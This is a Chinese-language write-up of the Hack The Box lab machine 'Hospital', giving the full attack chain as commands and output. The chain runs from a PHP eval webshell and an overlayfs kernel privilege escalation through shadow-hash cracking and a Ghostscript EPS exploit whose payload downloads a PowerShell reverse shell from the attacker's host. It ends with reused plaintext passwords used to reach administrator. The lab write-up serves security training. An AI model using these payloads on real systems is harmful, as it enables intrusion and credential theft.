Hospital
1. user
1.1. 信息收集
┌──(root㉿kali)-[~/Desktop/htb/hospital]
└─# rustscan -a 10.10.11.241 --ulimit 5000 -- -sCV
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 62 OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 e1:4b:4b:3a:6d:18:66:69:39:f7:aa:74:b3:16:0a:aa (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEOWkMB0YsRlK8hP9kX0zXBlQ6XzkYCcTXABmN/HBNeupDztdxbCEjbAULKam7TMUf0410Sid7Kw9ofShv0gdQM=
| 256 96:c1:dc:d8:97:20:95:e7:01:5f:20:a2:43:61:cb:ca (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGH/I0Ybp33ljRcWU66wO+gP/WSw8P6qamet4bjvS10R
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-26 22:11:05Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl? syn-ack ttl 127
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
1801/tcp open msmq? syn-ack ttl 127
2103/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
2105/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
2107/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
2179/tcp open vmrdp? syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: hospital.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
3269/tcp open globalcatLDAPssl? syn-ack ttl 127
| ssl-cert: Subject: commonName=DC
| Subject Alternative Name: DNS:DC, DNS:DC.hospital.htb
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.hospital.htb
| Issuer: commonName=DC.hospital.htb
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6021/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
6404/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
6406/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
6407/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
6409/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
6613/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
6621/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
8080/tcp open http syn-ack ttl 62 Apache httpd 2.4.55 ((Ubuntu))
|_http-server-header: Apache/2.4.55 (Ubuntu)
| http-title: Login
|_Requested resource was login.php
|_http-open-proxy: Proxy might be redirecting requests
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
Service Info: Host: DC; OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-05-26T22:12:04
|_ start_date: N/A
|_clock-skew: mean: 6h38m53s, deviation: 0s, median: 6h38m53s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 23222/tcp): CLEAN (Timeout)
| Check 2 (port 33349/tcp): CLEAN (Timeout)
| Check 3 (port 23197/udp): CLEAN (Timeout)
| Check 4 (port 57897/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
22/tcp open ssh syn-ack ttl 62
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
443/tcp open https syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
1801/tcp open msmq syn-ack ttl 127
2103/tcp open zephyr-clt syn-ack ttl 127
2105/tcp open eklogin syn-ack ttl 127
2107/tcp open msmq-mgmt syn-ack ttl 127
2179/tcp open vmrdp syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
6024/tcp open x11 syn-ack ttl 127
6404/tcp open boe-filesvr syn-ack ttl 127
6406/tcp open boe-processsvr syn-ack ttl 127
6407/tcp open boe-resssvr1 syn-ack ttl 127
6409/tcp open boe-resssvr3 syn-ack ttl 127
6612/tcp open unknown syn-ack ttl 127
6630/tcp open unknown syn-ack ttl 127
8080/tcp open http-proxy syn-ack ttl 62
9389/tcp open adws syn-ack ttl 127
有点奇怪,windows机器开了22 ssh端口,这是不常见的
1.2. 目录扫描
8080是一个登录框
┌──(root㉿kali)-[~/Desktop/htb/hospital]
└─# dirsearch -u http://10.10.11.241:8080 -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /root/Desktop/htb/hospital/reports/http_10.10.11.241_8080/_25-05-27_00-27-00.txt
Target: http://10.10.11.241:8080/
[00:27:00] Starting:
[00:27:02] 301 - 316B - /js -> http://10.10.11.241:8080/js/
[00:27:33] 200 - 0B - /config.php
[00:27:35] 301 - 317B - /css -> http://10.10.11.241:8080/css/
[00:27:40] 301 - 319B - /fonts -> http://10.10.11.241:8080/fonts/
[00:27:43] 301 - 320B - /images -> http://10.10.11.241:8080/images/
[00:27:46] 200 - 2KB - /login.php
[00:27:57] 200 - 2KB - /register.php
[00:28:07] 200 - 0B - /upload.php
[00:28:07] 301 - 321B - /uploads -> http://10.10.11.241:8080/uploads/
Task Completed
发现有注册和文件上传的路径
http://10.10.11.241:8080//register.php
先注册一个账号,然后登录
进来就是一个文件上传
1.3. 文件上传
这里尝试上传一个Php后门文件,但是限制了类型。
枚举一下看能不能上传其他后缀的php文件
然后发现Phar可以上传且可以被解析
这里环境有点奇怪,用了个奇怪的方法连哥斯拉
echo PD9waHAgZWNobyAnMTIzJzsgZXZhbCgkX1BPU1RbJ3Bhc3MnXSk7Pz4 |base64 -d > hack.php
这个靶机会定时清理uplaods下的文件,所以赶紧弹shell。
1.4. 提权
上传linpeas进行提权检测。
发现内核版本很低,那么可以进行内核提权
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash")'
在shadow里面发现了 drwilliams 用户的 hash
root@webserver:/root# cat /etc/shadow
root:$y$j9T$s/Aqv48x449udndpLC6eC.$WUkrXgkW46N4xdpnhMoax7US.JgyJSeobZ1dzDs..dD:19612:0:99999:7:::
daemon:*:19462:0:99999:7:::
bin:*:19462:0:99999:7:::
sys:*:19462:0:99999:7:::
sync:*:19462:0:99999:7:::
games:*:19462:0:99999:7:::
man:*:19462:0:99999:7:::
lp:*:19462:0:99999:7:::
mail:*:19462:0:99999:7:::
news:*:19462:0:99999:7:::
uucp:*:19462:0:99999:7:::
proxy:*:19462:0:99999:7:::
www-data:*:19462:0:99999:7:::
backup:*:19462:0:99999:7:::
list:*:19462:0:99999:7:::
irc:*:19462:0:99999:7:::
_apt:*:19462:0:99999:7:::
nobody:*:19462:0:99999:7:::
systemd-network:!*:19462::::::
systemd-timesync:!*:19462::::::
messagebus:!:19462::::::
systemd-resolve:!*:19462::::::
pollinate:!:19462::::::
sshd:!:19462::::::
syslog:!:19462::::::
uuidd:!:19462::::::
tcpdump:!:19462::::::
tss:!:19462::::::
landscape:!:19462::::::
fwupd-refresh:!:19462::::::
drwilliams:$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:19612:0:99999:7:::
lxd:!:19612::::::
mysql:!:19620::::::
$6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz3dABeF6QWumGBspUW378P1tlwak7NqzouoRTbrz6Ag0qcyGQxW192y/:qwe123!@#
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: $6$uWBSeTcoXXTBRkiL$S9ipksJfiZuO4bFI6I9w/iItu5.Ohoz...W192y/
Time.Started.....: Tue May 27 14:11:27 2025 (3 secs)
Time.Estimated...: Tue May 27 14:11:30 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 103.1 kH/s (7.74ms) @ Accel:512 Loops:64 Thr:128 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 262144/14344387 (1.83%)
Rejected.........: 0/262144 (0.00%)
Restore.Point....: 196608/14344387 (1.37%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000
Candidate.Engine.: Device Generator
Candidates.#1....: piggypie -> rebelde05
Hardware.Mon.#1..: Temp: 60c Util: 99% Core:2130MHz Mem:8001MHz Bus:8
获取到了明文密码 qwe123!@#,但是不知道这个用在哪里,然后发现是有开放443端口的,访问443是一个登录框。输入这对凭据即可登录
1.5. GhostScript命令注入 CVE-2023-36664
https://10.10.11.241/
进来可以发现是一个邮件系统
亲爱的露西:
我想提醒你,关于**更轻、更便宜、更环保的针头项目仍在进行中** 💉。你需要向我提供这些针头的设计图,以便我能把它们交给3D打印部门,立即开始生产。请将设计文件保存为 **“.eps”格式**,这样可以用GhostScript更好地查看。
此致, 克里斯·布朗
下面应该就是要我给他发一个 .eps 格式的文件吧,然后他会用 GhostScript 进行查看。这里就有两个利用点,一个是 .eps 文件,一个是 GhostScript
去github上面搜索看看
┌──(root㉿kali)-[~/Desktop/tools/GhostScript/CVE-2023-36664-Ghostscript-command-injection]
└─# python3 CVE_2023_36664_exploit.py --generate --payload "powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.16.82/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.82 -Port 4321" --filename shell --extension eps
[+] Generated EPS payload file: shell.eps
Warning
payload参数要用双引号包裹
本地开启监听,然后把 shell.eps 发过去
然后就可以获取到shell了
┌──(root㉿kali)-[~]
└─# nc -lvnp 4321
listening on [any] 4321 ...
connect to [10.10.16.82] from (UNKNOWN) [10.10.11.241] 35466
Windows PowerShell running as user drbrown on DC
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Users\drbrown.HOSPITAL\Documents>whoami
hospital\drbrown
1.6. RDP登录
在 drbrown.HOSPITAL\Documents 目录下发现了用户的凭据
PS C:\Users\drbrown.HOSPITAL\Documents>dir
Directory: C:\Users\drbrown.HOSPITAL\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/23/2023 3:33 PM 373 ghostscript.bat
PS C:\Users\drbrown.HOSPITAL\Documents> type ghostscript.bat
@echo off
set filename=%~1
powershell -command "$p = convertto-securestring 'chr!$br0wn' -asplain -force;$c = new-object system.management.automation.pscredential('hospital\drbrown', $p);Invoke-Command -ComputerName dc -Credential $c -ScriptBlock { cmd.exe /c "C:\Program` Files\gs\gs10.01.1\bin\gswin64c.exe" -dNOSAFER "C:\Users\drbrown.HOSPITAL\Downloads\%filename%" }"
PS C:\Users\drbrown.HOSPITAL\Documents>
drbrown.HOSPITAL
chr!$br0wn
发现3389端口是开放的
PS C:\Users\drbrown.HOSPITAL\Documents> netstat -ano |findstr "3389"
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 536
TCP 10.10.11.241:3389 10.10.16.82:44328 CLOSE_WAIT 536
TCP [::]:3389 [::]:0 LISTENING 536
UDP 0.0.0.0:3389 *:* 536
UDP [::]:3389 *:* 536
xfreerdp /u:drbrown /v:10.10.11.241 /p:'chr!$br0wn' /size:1920x1080 /timeout:60000
登录进来就是这个界面,发现账号密码都填好了。点击登录但是没有用,密码不对
在桌面下可以获取到user flag
8a06bcaa4927689eed7d1c1220c765ea
2. Root
退出后把那个powershell叉掉,发现马上又运行了一个selenium脚本。他给我自动填写了账号密码
不得不说一句这个Rdp是真卡啊
最后发现这个密码输入的还是错误的,沃日了
Th3B3stH0sp1t4l9786!
最后发现这个不是这门户网站的密码,windows管理员的密码
┌──(root㉿kali)-[~]
└─# nxc smb 10.10.11.241 -u administrator -p 'Th3B3stH0sp1t4l9786!'
SMB 10.10.11.241 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:hospital.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.241 445 DC [+] hospital.htb\administrator:Th3B3stH0sp1t4l9786! (Pwn3d!)
*Evil-WinRM* PS C:\users\administrator> cd desktop
*Evil-WinRM* PS C:\users\administrator\desktop> dir
Directory: C:\users\administrator\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/26/2025 7:41 PM 34 root.txt
*Evil-WinRM* PS C:\users\administrator\desktop> cat root.txt
49342235ce8451f5471cf93bc7c569ba